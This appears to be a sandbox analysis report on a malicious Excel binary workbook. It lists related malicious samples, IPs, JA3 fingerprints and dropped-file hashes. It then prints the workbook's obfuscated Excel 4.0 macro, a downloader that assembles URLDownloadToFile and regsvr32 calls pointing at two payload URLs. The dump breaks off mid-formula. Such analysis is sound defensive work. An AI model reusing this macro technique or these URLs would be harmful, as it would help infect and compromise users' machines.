IMH-WESTUS | PO9448882.exe | malicious | 209.182.202.96
IMH-WESTUS | check 6746422.xlsm | malicious | 192.249.126.181
IMH-WESTUS | TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exe | malicious | 192.145.239.54
IMH-WESTUS | proforma invoice.exe | malicious | 192.249.124.39
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | dLlF0bPWxx.exe | malicious | 103.28.36.10
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | eNjIpT5RzD.exe | malicious | 103.28.36.10
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Plq7ADczmp.exe | malicious | 103.28.36.10
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Nuvoco_RFQ_21-06-2021.exe | malicious | 103.124.93.155
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | plan-536150726.xlsb | malicious | 103.28.39.29
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | #U20ac9,770 pdf.exe | malicious | 103.28.36.229
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | c647b2da_by_Libranalysis.exe | malicious | 103.57.209.110
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | 1400000004-arrival.exe | malicious | 103.28.36.198
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | payment invoice.exe | malicious | 103.28.36.198
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Adjunto K_23165.doc | malicious | 103.28.39.103
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Adjunto K_23165.doc | malicious | 103.28.39.103
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | 211094.exe | malicious | 103.28.36.171
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | PO20210120.exe | malicious | 103.124.93.25
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Electronic form.doc | malicious | 103.124.92.138
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | SecuriteInfo.com.ArtemisC5924E341E9E.exe | malicious | 103.28.36.10
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Informacion 122020 N-98239.doc | malicious | 103.28.39.103
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | INFO.doc | malicious | 103.28.39.103
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | document-17616846.xls | malicious | 103.101.161.13
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | document-17616846.xls | malicious | 103.101.161.13
NHANHOA-AS-VNNhanHoaSoftwarecompanyVN | Information-822908953.doc | malicious | 103.101.162.60

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
37f463bf4616ecd445d4a1937da06e19 | djBbDPfGV3.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | CMXz729xzg.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | #Ud83d#Udcde_#U25b6Play_to_Listen.htm | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | jssloader.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | gYbyE02c71.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | Copy of Check.html | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | diagram-1878769052.xls | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | statistic-1496367785.xls | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | Bank_ details.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | prijenos SWIFT za partiju 220000000001182910.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | PO29012021,pdf.ppam | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | OFfcxY5xia.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | k72fFnCoEX.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | DWJn18MuX6.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | sp7UUM849P.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | CL2SJ8-LYGF7Z-SEJ2QPPAPL.htm | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | AqZrR9upiM.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | iduD2A1.dll | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | E6973qZ1cV.exe | malicious | 104.244.121.13, 103.28.39.29
37f463bf4616ecd445d4a1937da06e19 | 97FC461FD24104740310BD741F7F8EBF489E640AA93A0.exe | malicious | 104.244.121.13, 103.28.39.29

Dropped Files

No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\66988849-8D57-437E-97F2-4EBE1CC53C33
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):135209
                                                                                                                                                        Entropy (8bit):5.363066402926994
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:RcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:lEQ9DQW+zwXO1
                                                                                                                                                        MD5:57CE0440BA2348963E599DB7CC6D4E70
                                                                                                                                                        SHA1:9DC6386C0EFC19B9E88725D079F1561C74D3B672
                                                                                                                                                        SHA-256:EF58DE4D929D2D78D172CFE4DCB94D8815D2447D6A7482670CC4E0CAB3C5283B
                                                                                                                                                        SHA-512:B09ED0537E02581F7BF417E73D07A26F42AA40E2E7457D5E67FAA61033A653844939EA5FF6CEEA08158469A70F0690A92454F57523D8DE05A263CD6B78C1AE65
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-29T22:08:25">.. Build: 16.0.14228.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\31DD4392.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 848
Entropy (8bit): 7.595467031611744
Encrypted: false
SSDEEP: 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5: 02DB1068B56D3FD907241C2F3240F849
SHA1: 58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256: D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512: 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A6A9A6B.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 10270
Entropy (8bit): 7.975714699744477
Encrypted: false
SSDEEP: 192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
MD5: 9C4F09E387EA7B36C8149EA7C5F8876E
SHA1: FF83384288EB89964C3872367E43F25FAFF007CC
SHA-256: A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
SHA-512: 0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55637970.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 42557
Entropy (8bit): 7.992800895943226
Encrypted: true
SSDEEP: 768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
MD5: B1F262A694930ADB699FA94E3394887F
SHA1: 9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
SHA-256: 9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
SHA-512: 1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6B5ED695.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 557
Entropy (8bit): 7.343009301479381
Encrypted: false
SSDEEP: 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5: A516B6CB784827C6BDE58BC9D341C1BD
SHA1: 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256: EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512: C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D33DFFE4.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 32996
Entropy (8bit): 7.975478139053759
Encrypted: false
SSDEEP: 768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
MD5: 4E69B72B0CE87CC7EE30AA1A062147FE
SHA1: 09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
SHA-256: 77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
SHA-512: 6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D45FCAB1.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 18547
Entropy (8bit): 7.9850486438978985
Encrypted: false
SSDEEP: 384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
MD5: ED31C7053D581EDC4C98D222CE02EDEF
SHA1: 6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
SHA-256: 0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
SHA-512: 929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
Malicious: false
C:\Users\user\AppData\Local\Temp\17B40000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 160685
Entropy (8bit): 7.960590987645444
Encrypted: false
SSDEEP: 3072:AL289VlUBWA6CFvA7brCxAVIKW1xVymd1xXPfZTkdm3bGeAxiYbX:/83liWA6FiYW1xVyWxffZTkeGKa
MD5: 7E75F03941F240AA7190A08B60F3DD64
SHA1: D35A9AF59DE7669A5B834E47C8152434297A594F
SHA-256: CD196E167E0BBC1054D6DA19E4D9392CC88A8DCE9FADF080E133350703B3318D
SHA-512: 8DD02F7956125D799B40A5EA3E26D985CEB9AC7D5B0415BC2EE93D1E23F421E6F81112B3F52B33FDF1541D03F805648C40438EA1F93EBC38C9BC3BE9C3D20856
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: Little-endian UTF-16 Unicode text, with CR line terminators
Category: dropped
Size (bytes): 22
Entropy (8bit): 2.9808259362290785
Encrypted: false
SSDEEP: 3:QAlX0Gn:QKn
MD5: 7962B839183642D3CDC2F9CEBDBF85CE
SHA1: 2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256: 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512: 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious: false
Preview: ....p.r.a.t.e.s.h.....
C:\Users\user\Desktop\~$plan-515372324.xlsb
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 165
Entropy (8bit): 1.6081032063576088
Encrypted: false
SSDEEP: 3:RFXI6dtt:RJ1
MD5: 7AB76C81182111AC93ACF915CA8331D5
SHA1: 68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256: 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512: A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious: true
Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.950442215459519
TrID:
• Excel Microsoft Office Binary workbook document (47504/1) 49.74%
• Excel Microsoft Office Open XML Format document (40004/1) 41.89%
• ZIP compressed archive (8000/1) 8.38%
File name: plan-515372324.xlsb
File size: 159199
MD5: 08e52afbefa423fb9f1ea0af88a4880e
SHA1: 2d688dfee28f75553bc1d3633f891d2e70e0408b
SHA256: aaa32ff3e41c61fe828f0850e702f5ed7ffd6177c4bf80ed15324525537f44cd
SHA512: 7a5400ec826ecaa0fa6a8beb9022bd9e918f11cf97e57d747477720889f7203af983620e2f7b543fb1ff5cc5a9eff13447d6353506c862dfe2ebd23b7a63dee8
SSDEEP: 3072:q9VlUBWA6CFvA7bpKCxAVIKa8d/p4DqLdb1luxVymd1xXPtLrC/:q3liWA6FVNYa8dh4exQxVyWxfta
File Content Preview: PK..........!.d/.}............[Content_Types].xml ...(.......................................................................................................................................................((................................................

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "plan-515372324.xlsb"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXE,,,R,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CAL,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,khangland.pro/v8gEDeSB/sun.html 
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,jaipurbynite.com/stLdQs9R53/sun.htm,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                        "=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BA3,'Doc3'!AO18)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""
U""&'Doc3'!AO18&'Doc2'!BA4&'Doc2'!BA5,'Doc3'!AP13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AX24,'Doc3'!AP16)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!BB3&'Doc2'!BB4&'Doc2'!BB5&""B"",'Doc3'!AP15)",,,,,,,,,,,,,,,,"=FORMULA(before.6.17.50.sheet!AY47,'Doc3'!AO19)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AX25,'Doc3'!AP17)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AZ14,'Doc3'!AO20)",,,,,,,,,,,,,,,,"=FORMULA(""U""&'Doc3'!AO18&'Doc2'!BA7&'Doc2'!AY6&'Doc2'!BA6&'Doc2'!BA9&'Doc2'!AY7&""eA"",'Doc3'!AP14)",,,,,,,,,,,,,,,,"=FORMULA('Doc2'!AY14&'Doc2'!AX16&'Doc3'!AO19&'Doc2'!AY18&'Doc3'!AP13&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP14&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&'Doc3'!AP15&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY17&'Doc2'!AY16&""https://""&'Doc3'!AP17&'Doc2'!AY16&'Doc2'!AY17&'Doc2'!AY16&before.6.17.50.sheet!AY41&'Doc2'!AY16&'Doc2'!AY20&'Doc2'!AY20&'Doc2'!AY19,'Doc3'!AN14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA('Doc3'!AO20&'Doc2'!AX3&""C""&'Doc2'!AX10&'Doc2'!AX11&'Doc2'!AX12&'Doc2'!AX8&'Doc2'!AX9&'Doc2'!AX8&before.6.17.50.sheet!AY40&'Doc2'!AX7,'Doc3'!AN17)",,,,,,,,,,,,,,,,"=FORMULA(